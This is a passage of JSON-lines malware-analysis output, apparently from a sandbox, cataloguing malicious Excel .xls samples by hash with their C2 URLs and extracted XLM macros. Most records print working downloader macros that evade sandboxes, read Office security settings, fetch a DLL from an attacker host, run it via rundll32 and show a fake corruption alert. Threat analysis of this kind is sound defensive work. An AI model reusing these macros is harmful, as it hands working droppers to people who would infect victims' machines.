255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"arQeM1jyVk\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"12980dfb986e2eed3979e389094bf4db98afdb3562f48f8be6bbee9676020a13"},"analysis":{"reported":"2020-04-09T16:14:59Z","score":10},"files":[{"filename":"12980dfb986e2eed3979e389094bf4db98afdb3562f48f8be6bbee9676020a13","filesize":126464,"md5":"57a089f9c6fd8615baa87dd2f029cd91","sha1":"e21c5d446f4181e930dae6b8550d02c30c6d6ecb","sha256":"12980dfb986e2eed3979e389094bf4db98afdb3562f48f8be6bbee9676020a13","sha512":"d6941ecc4cc5507f237faeb3b95e50a21f38f6e552ed47961f6c13d5de7db7c6d07c48a07f823b329ef6be3bcc7b872c211602afbd06620813ed845c72d24a4f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"12980dfb986e2eed3979e389094bf4db98afdb3562f48f8be6bbee9676020a13.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://march262020.club/files/bot.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\\hQPDpQm\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://march262020.club/files/bot.dl\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll,DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"12cf089efd5960367ef94e1d9b5101a8c29097eca476ff16b52b9c6345eb1a7f"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"12cf089efd5960367ef94e1d9b5101a8c29097eca476ff16b52b9c6345eb1a7f","filesize":126464,"md5":"d41f33d8b2568c3fd3757d35717bf078","sha1":"0b0648c26fb06dba0c38ce58349275683395cd3c","sha256":"12cf089efd5960367ef94e1d9b5101a8c29097eca476ff16b52b9c6345eb1a7f","sha512":"d361e00c62f3586bcf7766bd1dadba12633394fc2ef43196fd78c1d010419a4bc66850a5e5c020b69b08abf4e20a7f817a5f2494bb2c7e6bbee4b84e3b8ccb4f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"12cf089efd5960367ef94e1d9b5101a8c29097eca476ff16b52b9c6345eb1a7f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://march262020.club/files/bot.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\XTHbSJX\\hQPDpQm\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://march262020.club/files/bot.dl\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\XTHbSJX\\hQPDpQm\\yNuMyDc.dll,DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"12edcbfb2cb3b03251088d3348143231adc15f881fad83382557455ad1a85912"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"12edcbfb2cb3b03251088d3348143231adc15f881fad83382557455ad1a85912","filesize":152576,"md5":"10226831e46105a7060585eb8af02225","sha1":"c739dbf9155021632ab668f7062a5656a0c74032","sha256":"12edcbfb2cb3b03251088d3348143231adc15f881fad83382557455ad1a85912","sha512":"d153634070db71fa9771ead72d87ff07ea4eeebe59c3e26077b46a1d1484bf0faf7d1cdce20fc066bc3d83eb29216d6ad33cc23fad0f6b0c9652c52f19decb48","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"12edcbfb2cb3b03251088d3348143231adc15f881fad83382557455ad1a85912.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vp8CVlIdBt\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"12f4781bc0358f3fc9d924482510a5a5f87c719450274aea91de0c6f5da4f9cc"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"12f4781bc0358f3fc9d924482510a5a5f87c719450274aea91de0c6f5da4f9cc","filesize":175104,"md5":"f93be6023f62c170f10596f5f00fe272","sha1":"a39af876c8a94178d0d144281af1df01c8198ea1","sha256":"12f4781bc0358f3fc9d924482510a5a5f87c719450274aea91de0c6f5da4f9cc","sha512":"6f0b29c09ac645d4857395866e50f9d1ff7c5f0a2622ab0ec0b19371e12d318d1ffa2ec189da914c2683a41cd52f2bbcf2f01785a58ec56fd1ea4e59f73a0f63","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"12f4781bc0358f3fc9d924482510a5a5f87c719450274aea91de0c6f5da4f9cc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"vdUVh1J6b4\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"12f66f168341e3ef08e507ed7fed7a45d9430bfc6b57309bd803500be64ad07c"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"12f66f168341e3ef08e507ed7fed7a45d9430bfc6b57309bd803500be64ad07c","filesize":209920,"md5":"84d430a52a058f4104cf821e91c9d24d","sha1":"08369c2c2b00fc8069376f267d9abb689add3e90","sha256":"12f66f168341e3ef08e507ed7fed7a45d9430bfc6b57309bd803500be64ad07c","sha512":"5b75f37c081fbe7c7dd28c8019ddc4dbb2eb3b50f4e9d6b1b80a14f2f6ac2e62db41a364b660461e631c5eab74be134e24fba49fed2303587109af616fad237a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"12f66f168341e3ef08e507ed7fed7a45d9430bfc6b57309bd803500be64ad07c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"eR0cw301Q7\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"130439d9b8a66117b05587c50710be9d35e765139086c73f9d2190a8602bfec5"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"130439d9b8a66117b05587c50710be9d35e765139086c73f9d2190a8602bfec5","filesize":113664,"md5":"51d9c2125b301db31c0bd075468e1022","sha1":"cee952ca77d8422234e1a17d79309e5932f9239c","sha256":"130439d9b8a66117b05587c50710be9d35e765139086c73f9d2190a8602bfec5","sha512":"fad28944ccdf7c017e0abfcae58c50d61aa91eae7d92e6f93476e50299fd2a6a3589515fed2837829bfa5bd3426d3e771e9f5f905574ff73a09f3c78c7029e76","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"130439d9b8a66117b05587c50710be9d35e765139086c73f9d2190a8602bfec5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"lyV7SycFPO\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"132329a5a7663a3d90b2e16916176a7eca2a9e0afc4c1c4f3d547f6b20c0c44e"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"132329a5a7663a3d90b2e16916176a7eca2a9e0afc4c1c4f3d547f6b20c0c44e","filesize":113664,"md5":"4f8bd9fdc2a17882d791fc4c513c3ac9","sha1":"2c08b076b76533ea9c7abe55ec2f25ff5a25378f","sha256":"132329a5a7663a3d90b2e16916176a7eca2a9e0afc4c1c4f3d547f6b20c0c44e","sha512":"6a0650ae56e7098a8eb8c5034de6e61a95e827c4d74cd410c3818b7aa8006d51714c9383afefa71e4c5a1fe78a509bdd227b2baae8be79adff0412780988b65b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"132329a5a7663a3d90b2e16916176a7eca2a9e0afc4c1c4f3d547f6b20c0c44e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HUJ7rYHeHS\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"132d916ef0bfaa7981583d17b25b89a39137afa06d3dc8041b75535f4a5159ad"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"132d916ef0bfaa7981583d17b25b89a39137afa06d3dc8041b75535f4a5159ad","filesize":185344,"md5":"0ee7e5a0a44b8e04f192d63c8eaf1f34","sha1":"1438c801b6d215919ce7f379b92d954b9200d046","sha256":"132d916ef0bfaa7981583d17b25b89a39137afa06d3dc8041b75535f4a5159ad","sha512":"1e3d50a4cd12a1d0c258a6091f5762262850923f45b9e58a78cf26a2c389a3ac12f99fa80cd698982c4601bc05c9e05edd81b34d87f198435648f3ab89bf007b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"132d916ef0bfaa7981583d17b25b89a39137afa06d3dc8041b75535f4a5159ad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://veqejzkb.xyz/SDVe2f2fds"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"13400d4f170b1aaf01b5460094a632ca9cae36f9375accd912b6eecf6d0c08b6"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"13400d4f170b1aaf01b5460094a632ca9cae36f9375accd912b6eecf6d0c08b6","filesize":103941,"md5":"b5fb846668b9020d7696a0a0f7f3feaa","sha1":"d02c220f77a8e4543a9a04291eb2b1b1aea09364","sha256":"13400d4f170b1aaf01b5460094a632ca9cae36f9375accd912b6eecf6d0c08b6","sha512":"e4251c4ab5152e2011ffe24355c181b5afead93943ff46b632443b6b1a5e3974f0e6f0c3f80eb86b6a693c227ea9be86a36f564fd056a89f34bf709966dd6836","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"13400d4f170b1aaf01b5460094a632ca9cae36f9375accd912b6eecf6d0c08b6.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://209.141.54.161/crypt.dl"],"attr":{"formulas":"CALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\",0)\nCALL(\"Kernel32\",\"CreateDirectoryA\",\"JCJ\",\"C:\\rncwner\\CkkYKlI\",0)\nCALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://209.141.54.161/crypt.dl\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll\",0,0)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCCJ\",0,\"Open\",\"rundll32.exe\",\"C:\\rncwner\\CkkYKlI\\UiQhTXx.dll DllRegisterServer\",0,0)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1342c4abdf43fed1466ce603e0551e8ad53389cb0b9cec9c59d65f6cd38f79ad"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"1342c4abdf43fed1466ce603e0551e8ad53389cb0b9cec9c59d65f6cd38f79ad","filesize":206336,"md5":"33f614dbf575b60a94c7de8d005c22c1","sha1":"557600c93072277ca755fac34f344424589271c5","sha256":"1342c4abdf43fed1466ce603e0551e8ad53389cb0b9cec9c59d65f6cd38f79ad","sha512":"c9847dc9cf694665acfb9aa2a819d89f49e6acd52b970a753ef115ef476d789a01c1bb6357a90f11d8bccc8bc2f48987fa486819614b58cfdda098b23d3a0fe0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1342c4abdf43fed1466ce603e0551e8ad53389cb0b9cec9c59d65f6cd38f79ad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"UqSdZrOVaw\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1345cb4ef740fd5b080d2222c55989332f944ad01cf047c3f055b7b961dee33a"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"1345cb4ef740fd5b080d2222c55989332f944ad01cf047c3f055b7b961dee33a","filesize":167936,"md5":"9d33f28b398d8dc9ab3c6fad517f5666","sha1":"ebc4fbe4593b1bffecb89be0466a25b7c60c8103","sha256":"1345cb4ef740fd5b080d2222c55989332f944ad01cf047c3f055b7b961dee33a","sha512":"1c55fdbab37662795192a77be35ce3e2a1fb8a39d6a98e456ab9c6e229bd8bf6cbff230248b1c1260095f2c2e566957bc4ecf5930ddaab176e4f6da46abde199","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1345cb4ef740fd5b080d2222c55989332f944ad01cf047c3f055b7b961dee33a.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"fraPcFkMVY\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1366e322c536fd84df93ef9c3814cdfad39e4d2e4e3218e5cf809c47777288ad"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"1366e322c536fd84df93ef9c3814cdfad39e4d2e4e3218e5cf809c47777288ad","filesize":167936,"md5":"2616dfd3e7697f56641730afb74b4dfd","sha1":"fcd9204e585fdb840cc5120271226e85dbfbd062","sha256":"1366e322c536fd84df93ef9c3814cdfad39e4d2e4e3218e5cf809c47777288ad","sha512":"78a5e3983f777df30e8628e941cd139f0ff1dcfc4c9614bbd571835660d69ecc88bd1050c4ce6cf10c77e5688c381c09f9386e638eb37530125a4bee4bcc73e6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1366e322c536fd84df93ef9c3814cdfad39e4d2e4e3218e5cf809c47777288ad.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"6ctzUIQif1\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"136cdfc57f086121777213a7d155311ae58889183722b8efa6403af64466da45"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"136cdfc57f086121777213a7d155311ae58889183722b8efa6403af64466da45","filesize":218112,"md5":"fc032b2d01a48fb4e53386a43c9f468a","sha1":"d6a4807a38f011a19e077041301361d15d9117de","sha256":"136cdfc57f086121777213a7d155311ae58889183722b8efa6403af64466da45","sha512":"b7e5fa8cb7fb22f602fe03f0753579c125ccb26c66a181ee75f600a6c5a5abc21b69c9dd5a7f2a42da86780f65a74ab47e50fbf3d76ad2405cdd9549c44d9a47","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"136cdfc57f086121777213a7d155311ae58889183722b8efa6403af64466da45.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://efbzfyvsb.website/f2f23"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-4]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-4]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Odn6N3TP77\",TRUE)\nGOTO(IF(GET.WORKSPACE(19),,CLOSE(TRUE)))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")\nCALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://efbzfyvsb.website/f2f23\",\"c:\\Users\\Public\\b7gf5yk.html\",0,0)\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5yk.html,DllRegisterServer\",0,5)\nCLOSE(FALSE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"13792e45e14d099d216621fba34aeb3a18e96f6fd3919c6229d04c7f49a8061b"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"13792e45e14d099d216621fba34aeb3a18e96f6fd3919c6229d04c7f49a8061b","filesize":147968,"md5":"b826b83587b2a3beb26d274c09b22188","sha1":"9c5b98effceb3ea90e5a91a8ee98c1796d7bff84","sha256":"13792e45e14d099d216621fba34aeb3a18e96f6fd3919c6229d04c7f49a8061b","sha512":"c84538095a8c297ea370463ad436f64e3bc4dc5d8b53fcb673d5b85730628d32256b5c342b8dd46a594d133dd99d504fce695a4855aff9b047e35989167383b0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"13792e45e14d099d216621fba34aeb3a18e96f6fd3919c6229d04c7f49a8061b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"mMCzLAyLsS\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"137fe432d656eab03f7397f41253517f4c038e946178cd4cf8832158c958cfb8"},"analysis":{"reported":"2020-04-09T16:15:00Z","score":10},"files":[{"filename":"137fe432d656eab03f7397f41253517f4c038e946178cd4cf8832158c958cfb8","filesize":185344,"md5":"e772fea2a43c207fac0495348da9e7ca","sha1":"2f2b3b9154b40fe9aa5cc783f0f0994541a41093","sha256":"137fe432d656eab03f7397f41253517f4c038e946178cd4cf8832158c958cfb8","sha512":"d97d751babbb4319d0b5a44fe39c6397859282b37e39effdc19d8c304bf3020650e11df45896bc15630badd405f08723d02e3f848e74f68b415ac6e375e61c74","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"137fe432d656eab03f7397f41253517f4c038e